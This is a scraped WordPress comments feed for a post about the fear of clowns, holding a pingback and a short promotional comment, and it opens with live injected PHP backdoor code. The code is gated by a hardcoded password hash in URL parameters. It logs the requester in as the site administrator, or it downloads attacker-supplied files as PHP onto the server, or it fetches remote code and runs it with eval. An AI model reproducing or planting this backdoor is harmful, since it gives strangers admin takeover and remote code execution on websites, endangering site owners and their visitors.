if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == 'aab3238922bcc25a6f606eb525ffdc56'){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}
Comments on: Coulrophobia: Are You Afraid of Clowns?
http://wtf.thebizzare.com/offbeat/culture/coulrophobia-are-you-afraid-of-clowns/
Weird News, Weird Stuff, Wtf PicturesWed, 13 Oct 2010 13:34:24 +0000hourly1http://wordpress.org/?v=3.0.3By: Top 10 Bizarre Phobias | Weird News
http://wtf.thebizzare.com/offbeat/culture/coulrophobia-are-you-afraid-of-clowns/comment-page-1/#comment-735
Top 10 Bizarre Phobias | Weird NewsSun, 08 Mar 2009 17:49:27 +0000http://wtf.thebizzare.com/?p=489#comment-735[...] 3. Coulrophobia - Fear of Clowns [...][...] 3. Coulrophobia – Fear of Clowns [...]
]]>
By: Sean
http://wtf.thebizzare.com/offbeat/culture/coulrophobia-are-you-afraid-of-clowns/comment-page-1/#comment-527
SeanSat, 14 Feb 2009 22:29:19 +0000http://wtf.thebizzare.com/?p=489#comment-527Check out Spitzle the Clown (the link with my name) for even more scary clown content.Check out Spitzle the Clown (the link with my name) for even more scary clown content.
]]>